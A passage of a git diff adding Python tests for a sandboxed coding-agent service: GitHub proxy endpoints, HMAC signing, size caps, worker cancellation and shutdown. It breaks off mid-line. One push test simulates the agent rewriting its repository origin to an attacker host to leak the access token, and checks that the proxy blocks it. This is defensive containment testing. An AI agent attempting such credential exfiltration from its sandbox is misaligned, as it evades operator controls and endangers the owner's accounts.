+async def test_github_error_passthrough_422(proxy_settings: Settings) -> None: + def gh(_: httpx.Request) -> httpx.Response: + return httpx.Response(422, json={"message": "validation failed"}) + + app = _build_app(proxy_settings, gh) + body = b'{"repo":"octo/widget","number":1,"body":"hi"}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/post_comment", + content=body, + headers={**_signed("POST", "/gh/v1/post_comment", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 422 + err = resp.json()["error"] + assert err["kind"] == "github" + assert err["status"] == 422 + assert err["message"] == "validation failed" + + +# ============================================================================ +# git transport endpoints +# ============================================================================ + + +async def test_git_clone_creates_pool_dir(proxy_settings: Settings, upstream_repo: Path) -> None: + app = _build_app(proxy_settings) + body = b'{"repo":"octo/widget","clone_url":"' + str(upstream_repo).encode() + b'","default_branch":"main"}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/clone", + content=body, + headers={**_signed("POST", "/gh/v1/git/clone", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200 + pool_dir = Path(resp.json()["pool_dir"]) + assert pool_dir.is_dir() + assert pool_dir == Path(proxy_settings.workspace_root) / "_pool" / "octo__widget" + assert (pool_dir / "HEAD").exists() or (pool_dir / ".git" / "HEAD").exists() + + +async def test_git_fetch_repairs_missing_alternate_and_bad_ref(proxy_settings: Settings, upstream_repo: Path) -> None: + pool_dir = Path(proxy_settings.workspace_root) / "_pool" / "octo__widget" + pool_dir.parent.mkdir(parents=True, exist_ok=True) + _git(["clone", "--filter=blob:none", str(upstream_repo), str(pool_dir)], Path(proxy_settings.workspace_root)) + + bad_ref = pool_dir / ".git" / "refs" / "heads" / "farm" / "bad" + bad_ref.parent.mkdir(parents=True, exist_ok=True) + bad_ref.write_text("0123456789012345678901234567890123456789\n", encoding="ascii") + + alternates = pool_dir / ".git" / "objects" / "info" / "alternates" + alternates.write_text(str(Path(proxy_settings.workspace_root) / "missing-objects") + "\n", encoding="utf-8") + + app = _build_app(proxy_settings) + body = b'{"repo":"octo/widget"}' + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/fetch", + content=body, + headers={**_signed("POST", "/gh/v1/git/fetch", body), "Content-Type": "application/json"}, + ) + + assert resp.status_code == 200, resp.text + assert Path(resp.json()["pool_dir"]) == pool_dir + assert not bad_ref.exists() + assert not alternates.exists() + + +async def test_git_push_happy_path(proxy_settings: Settings, upstream_repo: Path) -> None: + branch = "farm/abc/feature" + _, head = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + # Rewire origin to the bare upstream so the proxy's push lands there. + app = _build_app(proxy_settings) + body = ( + b'{"repo":"octo/widget","workspace_key":"octo__widget__1","branch":"' + + branch.encode() + + b'","expected_head":"' + + head.encode() + + b'"}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 200, resp.text + assert resp.json() == {"head": head, "branch": branch} + assert _bare_has_branch(upstream_repo, branch) + + +async def test_git_push_passes_slot_uid_to_git_push( + proxy_settings: Settings, upstream_repo: Path, monkeypatch: pytest.MonkeyPatch +) -> None: + from robomp.git_ops import PushResult + + branch = "farm/abc/slot" + repo_dir, head = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + # The push handler reads the origin URL as the slot uid. On Linux+root + # the staged workspace is root-owned; hand it to slot 2001 so the + # subprocess can stat it. On macOS dev this is a no-op (slot identity + # is never activated). + if platform.system() == "Linux" and os.geteuid() == 0: + for path in [repo_dir.parent, repo_dir, *repo_dir.rglob("*")]: + os.chown(path, 2001, 2001, follow_symlinks=False) + captured: dict[str, object] = {} + + def fake_git_push(path: Path, **kwargs: object) -> PushResult: + captured["path"] = path + captured.update(kwargs) + return PushResult(head=head, branch=branch) + + monkeypatch.setattr("robomp.proxy.server.git_push", fake_git_push) + app = _build_app(proxy_settings) + body = ( + b'{"repo":"octo/widget","workspace_key":"octo__widget__1","branch":"' + + branch.encode() + + b'","expected_head":"' + + head.encode() + + b'","slot_uid":2001}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + + assert resp.status_code == 200, resp.text + assert captured["path"] == repo_dir + assert captured["slot_uid"] == 2001 + + +@pytest.mark.parametrize("slot_uid", [0, -1, 65536]) +async def test_git_push_rejects_invalid_slot_uid(proxy_settings: Settings, slot_uid: int) -> None: + app = _build_app(proxy_settings) + body = ( + b'{"repo":"octo/widget","workspace_key":"octo__widget__1","branch":"x","expected_head":"' + + (b"0" * 40) + + b'","slot_uid":' + + str(slot_uid).encode() + + b"}" + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + + assert resp.status_code == 400 + assert "slot_uid" in resp.text + + +async def test_git_push_head_drift(proxy_settings: Settings, upstream_repo: Path) -> None: + branch = "farm/abc/drift" + _, _ = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + app = _build_app(proxy_settings) + fake_head = "0" * 40 + body = ( + b'{"repo":"octo/widget","workspace_key":"octo__widget__1","branch":"' + + branch.encode() + + b'","expected_head":"' + + fake_head.encode() + + b'"}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 409, resp.text + assert resp.json()["error"]["kind"] == "head_drift" + assert not _bare_has_branch(upstream_repo, branch) + + +async def test_git_push_workspace_key_mismatch(proxy_settings: Settings) -> None: + app = _build_app(proxy_settings) + body = ( + b'{"repo":"octo/widget","workspace_key":"other__repo__1","branch":"x","expected_head":"' + (b"0" * 40) + b'"}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 400 + assert "workspace_key" in resp.text + + +# ============================================================================ +# Finding 2 — HMAC must bind the raw query string +# ============================================================================ + + +async def test_hmac_rejects_query_mutation(proxy_settings: Settings) -> None: + """Sign `/gh/v1/issue?repo=octo/widget&number=1`, replay with number=2. + + The verifier MUST notice the mutated query and 401. Without binding the + query into the canonical string this request would sail through with an + attacker-chosen target issue. + """ + captured: list[httpx.Request] = [] + + def gh(req: httpx.Request) -> httpx.Response: + captured.append(req) + return httpx.Response( + 200, + json={ + "number": int(req.url.params["number"]), + "title": "T", + "body": "B", + "state": "open", + "user": {"login": "x"}, + "labels": [], + }, + ) + + app = _build_app(proxy_settings, gh) + legit_params = {"repo": "octo/widget", "number": 1} + headers = _signed("GET", "/gh/v1/issue", params=legit_params) + mutated = {"repo": "octo/widget", "number": 2} + async with await _async_client(app) as client: + resp = await client.get("/gh/v1/issue", params=mutated, headers=headers) + assert resp.status_code == 401, resp.text + # Upstream GitHub mock MUST NOT have been called — auth failed first. + assert captured == [] + + +# ============================================================================ +# Finding 3 — body must be size-capped BEFORE auth / before full buffer +# ============================================================================ + + +async def test_oversized_content_length_rejected_with_413(proxy_settings: Settings) -> None: + """Setting Content-Length above the cap is rejected at 413 cheaply. + + With the fix in place the proxy never reads the (huge) body into memory: + we declare CL > max_bytes and the handler aborts immediately. We force + a tiny cap so the test stays fast; the production default is 1 MiB. + """ + proxy_settings.gh_proxy_max_body_bytes = 256 # type: ignore[misc] + app = _build_app(proxy_settings, lambda _: httpx.Response(500, json={})) + payload = b"x" * 1024 + headers = { + **_signed("POST", "/gh/v1/post_comment", payload), + "Content-Type": "application/json", + # Lie about CL to prove the early-reject path doesn't read content. + "Content-Length": str(1024 * 1024 * 64), + } + async with await _async_client(app) as client: + resp = await client.post("/gh/v1/post_comment", content=payload, headers=headers) + assert resp.status_code == 413, resp.text + + +async def test_streamed_body_above_cap_rejected_with_413(proxy_settings: Settings) -> None: + """When Content-Length is honest but > cap, we still 413.""" + proxy_settings.gh_proxy_max_body_bytes = 64 # type: ignore[misc] + app = _build_app(proxy_settings, lambda _: httpx.Response(500, json={})) + payload = b'{"repo":"octo/widget","number":1,"body":"' + (b"y" * 200) + b'"}' + headers = { + **_signed("POST", "/gh/v1/post_comment", payload), + "Content-Type": "application/json", + } + async with await _async_client(app) as client: + resp = await client.post("/gh/v1/post_comment", content=payload, headers=headers) + assert resp.status_code == 413 + + +# ============================================================================ +# Finding 5 — push refuses attacker-controlled origin (PAT exfil guard) +# ============================================================================ + + +async def test_git_push_rejects_attacker_origin(proxy_settings: Settings, upstream_repo: Path) -> None: + """If the worktree's origin is rewritten to a non-github HTTPS URL, + the push endpoint MUST refuse with 400 BEFORE invoking `git push` (which + would carry the PAT to the attacker's host).""" + branch = "farm/abc/evil" + repo_dir, head = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + # Simulate the agent rewriting origin inside its sandbox worktree. + _git(["-C", str(repo_dir), "remote", "set-url", "origin", "https://evil.example.com/octo/widget.git"], repo_dir) + + app = _build_app(proxy_settings) + body = ( + b'{"repo":"octo/widget","workspace_key":"octo__widget__1","branch":"' + + branch.encode() + + b'","expected_head":"' + + head.encode() + + b'"}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 400, resp.text + # The legit upstream never received the branch — proves push wasn't run. + assert not _bare_has_branch(upstream_repo, branch) + + +async def test_git_push_rejects_origin_with_wrong_repo(proxy_settings: Settings, upstream_repo: Path) -> None: + """github.com host is not enough — owner/repo MUST match the request.""" + branch = "farm/abc/mismatch" + repo_dir, head = _stage_workspace(proxy_settings, upstream_repo, "octo/widget", 1, branch) + _git(["-C", str(repo_dir), "remote", "set-url", "origin", "https://github.com/attacker/other.git"], repo_dir) + + app = _build_app(proxy_settings) + body = ( + b'{"repo":"octo/widget","workspace_key":"octo__widget__1","branch":"' + + branch.encode() + + b'","expected_head":"' + + head.encode() + + b'"}' + ) + async with await _async_client(app) as client: + resp = await client.post( + "/gh/v1/git/push", + content=body, + headers={**_signed("POST", "/gh/v1/git/push", body), "Content-Type": "application/json"}, + ) + assert resp.status_code == 400, resp.text + assert not _bare_has_branch(upstream_repo, branch) diff --git a/python/robomp/tests/test_queue_cancel.py b/python/robomp/tests/test_queue_cancel.py new file mode 100644 index 000000000..98cc77a03 --- /dev/null +++ b/python/robomp/tests/test_queue_cancel.py @@ -0,0 +1,292 @@ +"""Cancellation primitives on WorkerPool. + +These tests stay at the public-ish surface of `WorkerPool` — they exercise the +hook registration contextvar that workers use and verify the dispatcher marks +cancelled events as failed with the documented marker. They do NOT spin up a +real omp subprocess; that's covered by the integration smoke test. +""" + +from __future__ import annotations + +import asyncio + +import pytest + +from robomp.cancellation import ( + clear_current_event, + register_cancel_hook, + set_current_event, + unregister_cancel_hook, +) +from robomp.config import Settings +from robomp.db import Database, EventRow +from robomp.queue import WorkerPool +from robomp.slot_pool import SlotPool + + +class _StubGitHub: + """Sentinel; queue tests don't talk to GitHub.""" + + +class _StubSandbox: + """Sentinel; queue tests don't touch the workspace pool.""" + + natives_cache = None + + +class _StubGitTransport: + """Sentinel; queue tests don't push.""" + + +def _make_pool(settings: Settings, db: Database) -> WorkerPool: + return WorkerPool( + settings=settings, + db=db, + github=_StubGitHub(), # type: ignore[arg-type] + sandbox=_StubSandbox(), # type: ignore[arg-type] + git_transport=_StubGitTransport(), # type: ignore[arg-type] + slot_pool=SlotPool(), + ) + + +def _row(delivery: str = "d1") -> EventRow: + return EventRow( + delivery_id=delivery, + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + received_at="2026-01-01T00:00:00Z", + state="running", + attempts=1, + last_error=None, + ) + + +@pytest.mark.asyncio +async def test_cancel_fires_hook_armed_by_worker(settings: Settings, db: Database) -> None: + """A worker that armed a hook gets it invoked when cancel_event runs.""" + pool = _make_pool(settings, db) + row = _row() + + fired = asyncio.Event() + + async def fake_worker() -> None: + # Mimic _run_event entering its contextvar scope: the helpers below are + # what worker.py invokes from inside the asyncio.to_thread call. + token = set_current_event(pool, row.delivery_id) + try: + await asyncio.to_thread(register_cancel_hook, fired.set) + # Park until somebody fires the hook. + await fired.wait() + finally: + await asyncio.to_thread(unregister_cancel_hook) + clear_current_event(token) + + worker = asyncio.create_task(fake_worker()) + # Give the worker a tick to register. + for _ in range(20): + await asyncio.sleep(0) + if row.delivery_id in pool._cancel_hooks: # noqa: SLF001 — test inspecting state + break + assert row.delivery_id in pool._cancel_hooks # noqa: SLF001 + + assert await pool.cancel_event(row.delivery_id) is True + await asyncio.wait_for(worker, timeout=1.0) + assert row.delivery_id in pool._cancelled # noqa: SLF001 + # Hook is consumed. + assert row.delivery_id not in pool._cancel_hooks # noqa: SLF001 + + +@pytest.mark.asyncio +async def test_cancel_before_arm_fires_immediately(settings: Settings, db: Database) -> None: + """Cancelling before the worker arms must still terminate it on register.""" + pool = _make_pool(settings, db) + row = _row("d2") + + # Cancel is requested before any worker has armed a hook. + assert await pool.cancel_event(row.delivery_id) is False + assert row.delivery_id in pool._cancelled # noqa: SLF001 + + # When the worker eventually registers, the hook must fire synchronously. + calls: list[int] = [] + token = set_current_event(pool, row.delivery_id) + try: + register_cancel_hook(lambda: calls.append(1)) + finally: + clear_current_event(token) + + assert calls == [1] + # Late-armed hook is NOT retained; cancel state is one-shot. + assert row.delivery_id not in pool._cancel_hooks # noqa: SLF001 + + +@pytest.mark.asyncio +async def test_dispatch_marks_cancelled_event_failed_with_marker( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + """A dispatch that observed cancellation marks the row failed + 'cancelled by operator'.""" + pool = _make_pool(settings, db) + + db.record_event( + delivery_id="d3", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + row = _row("d3") + + async def fake_dispatch(self: WorkerPool, r: EventRow, *, slot_uid: int | None = None) -> None: + # Simulate cancellation hitting mid-task and the omp subprocess raising. + await pool.cancel_event(r.delivery_id) + raise RuntimeError("subprocess died") + + monkeypatch.setattr(WorkerPool, "_dispatch", fake_dispatch) + await pool._run_event(row) # noqa: SLF001 — testing the dispatcher branch directly + + stored = db.get_event("d3") + assert stored is not None + assert stored.state == "failed" + assert stored.last_error == "cancelled by operator" + # State is cleared for future events. + assert row.delivery_id not in pool._cancelled # noqa: SLF001 + assert row.delivery_id not in pool._cancel_hooks # noqa: SLF001 + + +@pytest.mark.asyncio +async def test_non_cancelled_failure_keeps_real_traceback( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + """A garden-variety dispatch failure still records the traceback path.""" + pool = _make_pool(settings, db) + db.record_event( + delivery_id="d4", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + row = _row("d4") + + async def fake_dispatch(self: WorkerPool, r: EventRow, *, slot_uid: int | None = None) -> None: + raise ValueError("boom 42") + + monkeypatch.setattr(WorkerPool, "_dispatch", fake_dispatch) + await pool._run_event(row) # noqa: SLF001 + + stored = db.get_event("d4") + assert stored is not None + assert stored.state == "failed" + assert stored.last_error is not None + assert "boom 42" in stored.last_error + assert "cancelled by operator" not in stored.last_error + + +@pytest.mark.asyncio +async def test_run_event_marks_failed_when_not_shutting_down( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + """When `_shutting_down` is False, a dispatch failure still marks the row failed.""" + pool = _make_pool(settings, db) + assert pool._shutting_down is False # noqa: SLF001 + db.record_event( + delivery_id="d5", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + row = _row("d5") + + async def fake_dispatch(self: WorkerPool, r: EventRow, *, slot_uid: int | None = None) -> None: + raise RuntimeError("regular failure") + + monkeypatch.setattr(WorkerPool, "_dispatch", fake_dispatch) + await pool._run_event(row) # noqa: SLF001 + + stored = db.get_event("d5") + assert stored is not None + assert stored.state == "failed" + assert stored.last_error is not None + assert "regular failure" in stored.last_error + + +@pytest.mark.asyncio +async def test_cancel_unknown_delivery_returns_false(settings: Settings, db: Database) -> None: + """Cancelling an unknown delivery is a no-op that returns False.""" + pool = _make_pool(settings, db) + assert await pool.cancel_event("never-existed") is False + # The set still records the request — a later register would fire — but + # since no worker is armed, the cancel is harmless. + assert "never-existed" in pool._cancelled # noqa: SLF001 + + +@pytest.mark.asyncio +async def test_start_reaps_configured_slot_uids( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + calls: list[int] = [] + monkeypatch.setattr("robomp.queue._reap_slot", lambda uid: calls.append(uid)) + pool = WorkerPool( + settings=settings, + db=db, + github=_StubGitHub(), # type: ignore[arg-type] + sandbox=_StubSandbox(), # type: ignore[arg-type] + git_transport=_StubGitTransport(), # type: ignore[arg-type] + slot_pool=SlotPool([2001, 2002]), + ) + + await pool.start() + try: + assert sorted(calls) == [2001, 2002] + finally: + await pool.stop(drain_timeout=0.01, kill_timeout=0.01) + + +@pytest.mark.asyncio +async def test_run_event_reaps_slot_before_release( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + slot_pool = SlotPool([2001]) + pool = WorkerPool( + settings=settings, + db=db, + github=_StubGitHub(), # type: ignore[arg-type] + sandbox=_StubSandbox(), # type: ignore[arg-type] + git_transport=_StubGitTransport(), # type: ignore[arg-type] + slot_pool=slot_pool, + ) + db.record_event( + delivery_id="d-slot", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + order: list[tuple[str, int | None]] = [] + monkeypatch.setattr("robomp.queue._reap_slot", lambda uid: order.append(("reap", uid))) + release = slot_pool.release + + def record_release(slot_uid: int | None) -> None: + order.append(("release", slot_uid)) + release(slot_uid) + + monkeypatch.setattr(slot_pool, "release", record_release) + + async def fake_dispatch(self: WorkerPool, r: EventRow, *, slot_uid: int | None = None) -> None: + assert r.delivery_id == "d-slot" + assert slot_uid == 2001 + + monkeypatch.setattr(WorkerPool, "_dispatch", fake_dispatch) + + await pool._run_event(_row("d-slot")) # noqa: SLF001 + + stored = db.get_event("d-slot") + assert stored is not None + assert stored.state == "done" + assert order == [("reap", 2001), ("release", 2001)] diff --git a/python/robomp/tests/test_queue_shutdown.py b/python/robomp/tests/test_queue_shutdown.py new file mode 100644 index 000000000..87497e863 --- /dev/null +++ b/python/robomp/tests/test_queue_shutdown.py @@ -0,0 +1,281 @@ +"""Graceful shutdown drain + kill behavior on WorkerPool. + +These tests poke `WorkerPool` directly: they don't spin up a dispatcher loop +or omp subprocess. The contract under test is `stop()`'s drain-then-kill +sequence and `_run_event`'s shutting-down branch that leaves the DB row in +`running` so `reset_stuck_running()` can requeue it. +""" + +from __future__ import annotations + +import asyncio +from contextlib import suppress + +import pytest + +from robomp.config import Settings +from robomp.db import Database, EventRow +from robomp.queue import WorkerPool +from robomp.slot_pool import SlotPool + + +class _StubGitHub: + """Sentinel; queue tests don't talk to GitHub.""" + + +class _StubSandbox: + """Sentinel; queue tests don't touch the workspace pool.""" + + natives_cache = None + + +class _StubGitTransport: + """Sentinel; queue tests don't push.""" + + +def _make_pool(settings: Settings, db: Database) -> WorkerPool: + return WorkerPool( + settings=settings, + db=db, + github=_StubGitHub(), # type: ignore[arg-type] + sandbox=_StubSandbox(), # type: ignore[arg-type] + git_transport=_StubGitTransport(), # type: ignore[arg-type] + slot_pool=SlotPool(), + ) + + +def _row(delivery: str = "d1") -> EventRow: + return EventRow( + delivery_id=delivery, + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + received_at="2026-01-01T00:00:00Z", + state="running", + attempts=1, + last_error=None, + ) + + +@pytest.mark.asyncio +async def test_non_root_fallback_semaphore_caps_dispatch_concurrency( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + settings.max_concurrency = 1 + monkeypatch.setattr("robomp.queue.os.geteuid", lambda: 501) + + pool = WorkerPool( + settings=settings, + db=db, + github=_StubGitHub(), # type: ignore[arg-type] + sandbox=_StubSandbox(), # type: ignore[arg-type] + git_transport=_StubGitTransport(), # type: ignore[arg-type] + ) + + db.record_event( + delivery_id="d-one", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + db.record_event( + delivery_id="d-two", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#2", + payload={"action": "opened"}, + state="running", + ) + + dispatch_started = asyncio.Event() + release_dispatch = asyncio.Event() + started: list[str] = [] + + async def blocked_dispatch(self: WorkerPool, row: EventRow, *, slot_uid: int | None = None) -> None: + assert slot_uid is None + started.append(row.delivery_id) + dispatch_started.set() + await release_dispatch.wait() + + monkeypatch.setattr(WorkerPool, "_dispatch", blocked_dispatch) + + first = asyncio.create_task(pool._run_event(_row("d-one"))) # noqa: SLF001 + await asyncio.wait_for(dispatch_started.wait(), timeout=1.0) + + second = asyncio.create_task(pool._run_event(_row("d-two"))) # noqa: SLF001 + await asyncio.sleep(0) + assert started == ["d-one"] + + release_dispatch.set() + await asyncio.wait_for(asyncio.gather(first, second), timeout=1.0) + assert started == ["d-one", "d-two"] + + +@pytest.mark.asyncio +async def test_stop_drains_inflight_within_timeout(settings: Settings, db: Database) -> None: + """A short in-flight task finishes during the drain window; no kill hook needed.""" + pool = _make_pool(settings, db) + + async def short_coro() -> None: + await asyncio.sleep(0.05) + + task = asyncio.create_task(short_coro()) + pool._inflight_tasks[task] = "d-short" # noqa: SLF001 + + await pool.stop(drain_timeout=1.0, kill_timeout=0.1) + + assert pool._shutting_down is True # noqa: SLF001 + assert task.done() + + +@pytest.mark.asyncio +async def test_stop_fires_kill_hook_when_drain_exceeds_timeout(settings: Settings, db: Database) -> None: + """When drain times out, stop() pops and runs the registered cancel hook. + + The DB row stays `running` because `_run_event` (not exercised here) is + the only path that mutates state, and even when triggered post-kill the + shutting_down flag suppresses `mark_event(..., 'failed')`. + """ + pool = _make_pool(settings, db) + db.record_event( + delivery_id="d-blocked", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + + hook_called = asyncio.Event() + pool._cancel_hooks["d-blocked"] = hook_called.set # noqa: SLF001 + + never = asyncio.Event() + + async def _park() -> None: + await never.wait() + + blocked = asyncio.create_task(_park()) + pool._inflight_tasks[blocked] = "d-blocked" # noqa: SLF001 + + await pool.stop(drain_timeout=0.05, kill_timeout=0.05) + + assert hook_called.is_set() + stored = db.get_event("d-blocked") + assert stored is not None + assert stored.state == "running" + + blocked.cancel() + with suppress(asyncio.CancelledError): + await blocked + + +@pytest.mark.asyncio +async def test_run_event_skips_mark_event_when_shutting_down( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + """During shutdown, a dispatch exception on a deliberately-cancelled delivery leaves the row untouched.""" + pool = _make_pool(settings, db) + pool._shutting_down = True # noqa: SLF001 + pool._shutdown_cancelled.add("d-shutdown") # noqa: SLF001 + + db.record_event( + delivery_id="d-shutdown", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + + async def fake_dispatch(self: WorkerPool, r: EventRow, *, slot_uid: int | None = None) -> None: + raise RuntimeError("omp died") + + monkeypatch.setattr(WorkerPool, "_dispatch", fake_dispatch) + await pool._run_event(_row("d-shutdown")) # noqa: SLF001 + + stored = db.get_event("d-shutdown") + assert stored is not None + assert stored.state == "running" + assert stored.last_error is None + + +@pytest.mark.asyncio +async def test_stop_cancels_hookless_inflight_task(settings: Settings, db: Database) -> None: + """A task claimed but stuck pre-hook MUST be cancelled by stop(), not allowed to spawn omp. + + Reproduces the P1 finding: pre-fix, stop()'s kill phase iterated cancel + hooks only, so an in-flight task without a hook (still waiting on the + semaphore or inside RpcClient.__enter__) was left running and could + proceed to spawn a fresh subprocess after stop() returned. + """ + pool = _make_pool(settings, db) + + reached_spawn = False + pre_hook_started = asyncio.Event() + + async def stuck_pre_hook() -> None: + nonlocal reached_spawn + pre_hook_started.set() + # Simulate waiting on a slow resource (semaphore / RpcClient.__enter__); + # we never get a chance to register a cancel hook. + try: + await asyncio.sleep(5.0) + except asyncio.CancelledError: + raise + # Pre-fix: this line was reachable after stop() returned. + reached_spawn = True + + task = asyncio.create_task(stuck_pre_hook()) + pool._inflight_tasks[task] = "d-hookless" # noqa: SLF001 + await asyncio.wait_for(pre_hook_started.wait(), timeout=1.0) + + await pool.stop(drain_timeout=0.05, kill_timeout=0.2) + + # Give the event loop a tick for cancellation to settle, then assert. + await asyncio.sleep(0) + assert task.done(), "stop() must terminate hookless in-flight tasks" + assert task.cancelled(), "hookless task must be cancelled, not left running" + assert reached_spawn is False, "task body must not progress past stop()" + assert "d-hookless" in pool._shutdown_cancelled # noqa: SLF001 + + +@pytest.mark.asyncio +async def test_run_event_marks_failed_for_unrelated_failure_during_drain( + settings: Settings, db: Database, monkeypatch: pytest.MonkeyPatch +) -> None: + """A dispatch that fails for its own reasons during the drain window MUST still mark failed. + + Reproduces the P2 finding: pre-fix, `_shutting_down=True` alone gated + the suppression branch, so any exception raised during the drain + window was masked and the row was silently requeued on the next + start(). After the fix, only deliveries in `_shutdown_cancelled` + (the ones stop() actually interrupted) get the suppression. + """ + pool = _make_pool(settings, db) + pool._shutting_down = True # noqa: SLF001 + # Crucially: this delivery is NOT in `_shutdown_cancelled` — stop() + # never targeted it. Its failure is its own. + + db.record_event( + delivery_id="d-real-fail", + event_type="issues", + repo="octo/widget", + issue_key="octo/widget#1", + payload={"action": "opened"}, + state="running", + ) + + async def fake_dispatch(self: WorkerPool, r: EventRow, *, slot_uid: int | None = None) -> None: + raise RuntimeError("genuine bug, not shutdown") + + monkeypatch.setattr(WorkerPool, "_dispatch", fake_dispatch) + await pool._run_event(_row("d-real-fail")) # noqa: SLF001 + + stored = db.get_event("d-real-fail") + assert stored is not None + assert stored.state == "failed", "non-shutdown failure during drain must mark failed" + assert stored.last_error is not None + assert "genuine bug, not shutdown" in stored.last_error diff --git a/python/robomp/tests/test_sandbox.py b/python/robomp/tests/test_sandbox.py new file mode 100644 index 000000000..1d5641618 --- /dev/null +++ b/python/robomp/tests/test_sandbox.py @@ -0,0 +1,1324 @@ +from __future__ import annotations + +import os +import platform +import signal +import stat +import subprocess +from pathlib import Path + +import pytest + +from robomp.git_ops import GitCommandError +from robomp.sandbox import ( + SandboxManager, + Workspace, + _chown_workspace, + _prepare_slot_runtime_env, + _prepare_slot_tmpdir, + _provision_runtime_dirs, + _reap_slot, + _safe_directory_env, + _share_git_metadata_with_slots, + _slot_pids, + _slot_subprocess_kwargs, + make_branch, + rename_workspace_branch, + workspace_key, +) + + +def _git(args: list[str], cwd: Path) -> None: + subprocess.run(["git", *args], cwd=str(cwd), check=True, capture_output=True, text=True) + + +def _workspace(root: Path) -> Workspace: + return Workspace( + root=root, + repo_dir=root / "repo", + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch="farm/test/topic", + repo_full_name="octo/widget", + issue_number=1, + ) + + +@pytest.fixture +def upstream_repo(tmp_path: Path) -> Path: + """Create a local --bare-ish remote with one commit on main.""" + repo = tmp_path / "upstream.git" + repo.mkdir() + _git(["init", "--initial-branch=main", "--bare", str(repo)], cwd=tmp_path) + seed = tmp_path / "seed" + seed.mkdir() + _git(["init", "--initial-branch=main", str(seed)], cwd=tmp_path) + (seed / "README.md").write_text("hello\n", encoding="utf-8") + _git(["-C", str(seed), "add", "."], cwd=tmp_path) + env = os.environ | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + } + subprocess.run( + ["git", "commit", "-m", "init"], + cwd=str(seed), + check=True, + capture_output=True, + text=True, + env=env, + ) + _git(["-C", str(seed), "remote", "add", "origin", str(repo)], cwd=tmp_path) + _git(["-C", str(seed), "push", "origin", "main"], cwd=tmp_path) + return repo + + +def test_workspace_key_and_branch_shape() -> None: + assert workspace_key("oven-sh/bun", 30654) == "oven-sh__bun__30654" + branch = make_branch(issue_number=30654, title="JSON.parse crashes on BOM", seed="oven-sh/bun#30654") + assert branch.startswith("farm/") + parts = branch.split("/") + assert len(parts) == 3 and len(parts[1]) == 8 + assert "json-parse-crashes" in parts[2] + + +def _init_worktree_repo(repo_dir: Path, branch: str) -> None: + """Stand up a minimal local git repo with `branch` checked out.""" + repo_dir.mkdir(parents=True, exist_ok=True) + _git(["init", f"--initial-branch={branch}", str(repo_dir)], cwd=repo_dir.parent) + (repo_dir / "README.md").write_text("hello\n", encoding="utf-8") + _git(["-C", str(repo_dir), "add", "."], cwd=repo_dir.parent) + subprocess.run( + ["git", "commit", "-m", "init"], + cwd=str(repo_dir), + check=True, + capture_output=True, + text=True, + env=os.environ + | { + "GIT_AUTHOR_NAME": "t", + "GIT_AUTHOR_EMAIL": "t@t", + "GIT_COMMITTER_NAME": "t", + "GIT_COMMITTER_EMAIL": "t@t", + }, + ) + + +def test_rename_workspace_branch_renames_local_branch(tmp_path: Path) -> None: + root = tmp_path / "ws" + repo_dir = root / "repo" + initial = "farm/abc12345/some-issue" + _init_worktree_repo(repo_dir, initial) + ws = Workspace( + root=root, + repo_dir=repo_dir, + session_dir=root / ".omp-session", + context_dir=root / "context", + artifacts_dir=root / "artifacts", + branch=initial, + repo_full_name="octo/widget", + issue_number=1, + ) + new_branch = rename_workspace_branch(ws, "fix-json-bom") + assert new_branch 